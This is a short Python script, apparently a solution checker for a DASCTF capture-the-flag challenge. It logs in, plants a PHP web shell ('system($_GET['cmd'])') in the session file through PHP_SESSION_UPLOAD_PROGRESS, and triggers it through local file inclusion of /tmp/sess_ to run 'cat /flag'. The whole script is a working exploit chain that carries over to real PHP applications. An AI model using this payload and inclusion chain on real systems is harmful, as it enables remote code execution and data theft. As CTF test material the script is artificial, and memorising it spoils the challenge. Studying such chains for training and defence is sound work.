#!/usr/bin/python
# -*- coding: utf-8 -*-
import re, sys, requests

HOST, PORT, FLAG = sys.argv[1:4]

def exp(ip, port):
    url = f"http://{ip}:{port}"
    session_id = "ctfexploitsession"
    
    cookies = {
        "PHPSESSID": session_id
    }
    
    login_data = {
        "username": "user",
        "password": "user123"
    }
    requests.post(f"{url}/login.php", data=login_data, cookies=cookies, allow_redirects=False)
    
    data = {
        "PHP_SESSION_UPLOAD_PROGRESS": "<?php system($_GET['cmd']); ?>"
    }
    files = {
        "file": ("exploit.txt", "A" * 5000)
    }
    requests.post(f"{url}/upload.php", data=data, files=files, cookies=cookies)
    
    r = requests.get(f"{url}/index.php?page=/tmp/sess_{session_id}&cmd=cat /flag", cookies=cookies)
    flag = re.findall('DASCTF{(.*?)}', r.text)[0]
    return flag

if __name__ == '__main__':
    assert exp(HOST, PORT) == FLAG
    print("Pass!")